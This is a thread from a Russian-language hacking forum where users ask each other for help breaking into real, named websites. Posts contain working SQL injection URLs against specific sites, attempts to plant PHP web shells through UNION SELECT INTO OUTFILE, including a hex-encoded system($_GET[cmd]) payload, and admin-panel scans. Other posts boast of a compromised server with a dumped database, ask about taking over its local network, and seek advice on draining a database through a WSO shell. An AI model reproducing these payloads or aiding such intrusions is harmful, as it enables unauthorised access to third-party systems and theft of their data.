Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    http://www.datemefree.org/guestbook.php?to=-124926+order+by+1/*
    Не могу никак подобрать поля, не обрезается запрос.
     
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    406
    Reputations:
    196

    попробовать выйти за пределы папки, куда заливаешь (залить в другую)
     
  3. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    так а как ? там всё автоматом заливается в папку img
     
  4. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Помогите найти админку: http://www.qatofin.com.qa/en/

    Сканером только это удалось найти:

    http://www.qatofin.com.qa/cgi-bin/ HTTP 403 Forbidden
    http://www.qatofin.com.qa/en/ HTTP 200 OK
    http://www.qatofin.com.qa/icons/ HTTP 200 OK
    http://www.qatofin.com.qa/icons/ HTTP 200 OK
    http://www.qatofin.com.qa/phpmyadmin HTTP 403 Forbidden
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://www.google-store.com/index.php?cPath=-23+union+select+1

    поXакаем google? ;)
     
    _________________________
    1 person likes this.
  6. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    FlaktW http://www.qatofin.com.qa/en/admin/login.php
     
    1 person likes this.
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    ребят есть сервер,у меня тут контроль на 100% ,качал все скрипты, сдампил базу

    что еще можно сделать :D ??

    ftp доступ тоже есть :)
     
    _________________________
  8. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    337
    Likes Received:
    142
    Reputations:
    81
    захватить локальную сеть ?
     
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    и как это реализовать? :)
     
    _________________________
  10. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Помогите залить шелл, а то что-то не получаеться
    пробовал
    Code:
    http://www.casinophiles.com/news.php?id=-1301+UNION+SELECT+1,'%3C?%20system($_GET[''cmd''])%20?%3E',3,4,5+FROM+'extra'+into+outfile+'/www/179/www.casinophiles.com/img.php'--
    и
    Code:
    http://www.casinophiles.com/news.php?id=-1301+UNION+SELECT+0x3C3F20706870696E666F28293B203F3E,2,3,4,5+FROM+extra.software+INTO+DUMPFILE+'/www/179/www.casinophiles.com/img.php'--
    немогу понять в чом проблема!!
     
  11. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    406
    Reputations:
    196

    прав не хватает на запись в папку эту
     
  12. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    337
    Likes Received:
    142
    Reputations:
    81
    например http://forum.antichat.ru/showthread.php?p=978803
     
    1 person likes this.
  13. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    попугай, а что можешь подсказать??
    есть ещо папка /flags/
     
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    спасибо, попробую
     
    _________________________
  15. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    Не могу разобраться с wso шеллом
    залил его на сайт а phpadmin лежит в папке c:interpub/www/phpadmin
    нужно его скопировать в c:interpub/site.com/
    выбираю папку ставлю галку выбираю скопировать а конечный путь куда копировать
    не появляется?
    есть меню Execute: может можно командой написать, там windows nt стоит
    повсякому пробывал, через шелл madneta не создаёт папки
    Помогите бедному студенту заработать на пиво please
    осталось только слить базу
     
  16. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,573
    Likes Received:
    976
    Reputations:
    783
    А через wso что ли не слить базу? ояебу
     
  17. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    .Slip не конектится через wso не могу поять почему выходит ошибка
    скопировал phpadmin выходит такая ошибка

    Cannot load mysql extension. Please check your PHP configuration. - Documentation

    на хосте размещаются ещё несколько сайтов на некоторых есть пхпадмин захожу туда - точно такая же ошибка ... Что может это может быть?
     
  18. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    232
    Likes Received:
    89
    Reputations:
    27
    сори за глупый вопрос, но вот пытаюсь залить шелл вот так:
    detalle.php?id=-1+union+select+0x3C3F73797374656D28245F4745545B2220636D64225D293B3F3E,2,3,4,5,6+into+outfile+'/home/site/html/shell.php'--

    3C3F73797374656D28245F4745545B2220636D64225D293B3F3E -- это я захексил <?system($_GET[cmd]);?>

    проблема в том что кавычки в этом месте слешируются '/home/site/html/shell.php' что можно сделать?
     
  19. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    Если maqic_quotes включен, то никак. Есть один вариант, через двойные запросы, вроде бы Scipio писал.
    Но сомневаюсь, что ты понимаешь что это такое и как это реализовать, потому что вопрос действитеьно глупый.
     
  20. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Не могу найти админку: http://www.ehealth2008.si/index.php

    Сканер только это нашел:

    http://www.ehealth2008.si/images/ HTTP 200 OK
    http://www.ehealth2008.si/src/ HTTP 200 OK
    http://www.ehealth2008.si/stats/ HTTP 401 Authorization Required
    http://www.ehealth2008.si/server-status/ HTTP 403 Forbidden
    http://www.ehealth2008.si/about.php HTTP 200 OK
    http://www.ehealth2008.si/icons/ HTTP 200 OK
    http://www.ehealth2008.si/index.php HTTP 200 OK
    http://www.ehealth2008.si/src/ HTTP 200 OK
    http://www.ehealth2008.si/style.css HTTP 200 OK
    http://www.ehealth2008.si/cgi-bin/ HTTP 403 Forbidden

    Помогите, плиз.
     
Loading...
Thread Status:
Not open for further replies.